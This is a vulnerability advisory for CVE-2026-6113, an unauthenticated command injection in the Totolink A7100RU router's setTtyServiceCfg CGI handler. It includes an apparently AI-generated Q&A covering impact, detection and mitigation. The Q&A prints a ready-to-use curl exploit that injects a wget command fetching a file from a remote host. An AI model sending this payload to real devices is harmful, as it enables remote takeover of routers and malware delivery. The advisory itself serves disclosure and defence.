CVE-2026-6113
Remote OS Command Injection in Totolink A7100RU CGI Handler
Publication date: 2026-04-12
Last updated on: 2026-04-12
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-6113 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI Handler component, specifically in the function setTtyServiceCfg within the /cgi-bin/cstecgi.cgi file. The vulnerability arises because the user-supplied parameter "ttyEnable" is not properly sanitized before being used in a system command execution function.
An attacker can send a specially crafted POST request to the router that includes malicious commands in the ttyEnable parameter. These commands are then executed by the router's operating system, allowing the attacker to run arbitrary system commands remotely.
A proof of concept shows that an attacker can use this vulnerability to execute commands like downloading files from a remote server by injecting commands such as `wget`.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary system commands on the affected TOTOLINK A7100RU router without any authentication.
- Attackers can take full control of the device, potentially altering its configuration or using it as a foothold to attack other devices on the network.
- It can lead to unauthorized access, data theft, or disruption of network services.
- Malicious commands could be used to download and execute malware, exfiltrate sensitive information, or create persistent backdoors.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for specially crafted POST requests sent to the endpoint /cgi-bin/cstecgi.cgi that include the parameter ttyEnable with suspicious or command injection payloads.
A proof of concept involves sending a POST request with a JSON body containing "topicurl" set to "setTtyServiceCfg" and the "ttyEnable" parameter set to a command such as `wget 192.168.6.1:7777/testpoc`.
To detect exploitation attempts, you can use network monitoring tools or intrusion detection systems to look for HTTP POST requests to /cgi-bin/cstecgi.cgi with suspicious payloads in the ttyEnable parameter.
Example command using curl to test if the device is vulnerable (do not run on production without authorization):
- curl -X POST http://<target-ip>/cgi-bin/cstecgi.cgi -H "Content-Type: application/json" -d '{"topicurl":"setTtyServiceCfg","ttyEnable":"wget 192.168.6.1:7777/testpoc"}'
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the affected device's management interface, especially blocking remote access to the /cgi-bin/cstecgi.cgi endpoint.
Additionally, monitor and filter incoming HTTP POST requests to detect and block attempts to exploit the ttyEnable parameter.
If possible, update the firmware of the Totolink A7100RU router to a version that patches this vulnerability or apply any vendor-provided security updates.
As a temporary measure, disable or restrict the CGI Handler component or the setTtyServiceCfg function if configurable.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The CVE-2026-6113 vulnerability allows remote attackers to execute arbitrary system commands on the affected Totolink A7100RU router due to insufficient input sanitization in the setTtyServiceCfg function. This type of vulnerability can lead to unauthorized access, data breaches, and potential compromise of sensitive information.
Such security weaknesses can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require organizations to protect personal and sensitive data against unauthorized access and ensure the integrity and confidentiality of systems processing such data.
If exploited, this vulnerability could result in data exposure or system control loss, thereby violating requirements for data protection, incident response, and risk management mandated by these regulations.